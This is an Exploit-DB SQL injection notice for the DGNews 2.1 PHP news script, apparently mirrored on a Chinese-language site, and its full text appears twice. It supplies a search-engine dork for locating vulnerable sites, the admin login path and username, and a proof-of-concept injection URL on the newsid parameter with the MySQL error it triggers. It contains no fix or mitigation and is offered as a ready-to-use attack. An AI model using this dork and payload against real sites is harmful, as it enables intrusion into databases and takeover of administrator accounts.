DGNews 2.1 – SQL Injection

• Exploit Database
• 133 阅读

• 作者： kalashnikov
  日期： 2010-12-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15853/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  #Remote SQL Injection Vulnerability #name: DGNews v 2.1 #Author: kalashnikov #dork: inurl:news.php?go=fullnews&newsid #admincp : admin/login.php // the user is "admin"===========MYSQL INJ======= http://localhost/pach/news.php?go=fullnews&newsid=1' =========================== Warning: mysql_num_rows(): /home/user/public_html/news.php on line 227=========================== # Site: http://vbspiders.com # Group : KaLa$nikoV t34m # Date: {26-12-2010} # Software: DGNews v 2.1 # Greetz: just me :L # team: VoLc4n0 --=-- stone love --=-- fla$h   #Remote SQL Injection Vulnerability #name: DGNews v 2.1# Author: kalashnikov #dork: inurl:news.php?go=fullnews&newsid #admincp : admin/login.php // the user is "admin"===========MYSQL INJ======= http://localhost/pach/news.php?go=fullnews&newsid=1' =========================== Warning: mysql_num_rows(): /home/user/public_html/news.php on line 227 =========================== # Site: http://vbspiders.com # Group : KaLa$nikoV t34m # Date: {26-12-2010}# Software: DGNews v 2.1# Greetz: just me :L # team: VoLc4n0 --=-- stone love --=-- fla$h